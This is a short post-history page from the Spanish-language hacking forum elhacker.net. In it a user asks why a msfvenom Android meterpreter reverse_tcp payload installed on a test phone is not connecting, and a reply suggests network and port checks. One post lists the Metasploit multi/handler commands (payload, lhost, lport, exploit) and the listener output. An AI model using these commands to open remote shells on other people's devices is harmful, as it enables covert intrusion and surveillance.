elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Hacking / MSFVENOM/ android/payload/reverse_tcp en: 28 Julio 2018, 23:34 pm
Saben si los exploits de msfvenom aun funcionana en terminales Android con sistemas arriba de 5.1???
2  Foros Generales / Dudas Generales / Re: msfvenom/ android payload no started en: 28 Julio 2018, 23:29 pm
Esta el movil en tu WiFi?? Has puesto el mismo Puerto y la misma IP en el apk y la k te sale ahi k esta a la escucha??

El movil esta conectado a mi misma red y si son los mismos parametros en la apk pero no me sale nada en escucha
3  Foros Generales / Dudas Generales / msfvenom/ android payload no started en: 28 Julio 2018, 21:04 pm
Hola que tal a todos tengo problemas al ejecutar el exploit de msfvenom ya descargue la apk a mi terminal para pruebas, una ves echo el apk me dirijo a comenzar con la consola de msf denntro configuro los comandos de esta forma


msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 00.000.0.00
lhost => 000.000.0.00
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > exploit

  • Started reverse TCP handler on 192.168.1.67:4444

......... de este proceso no pasa y no se que es lo que falla o esta mal........
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines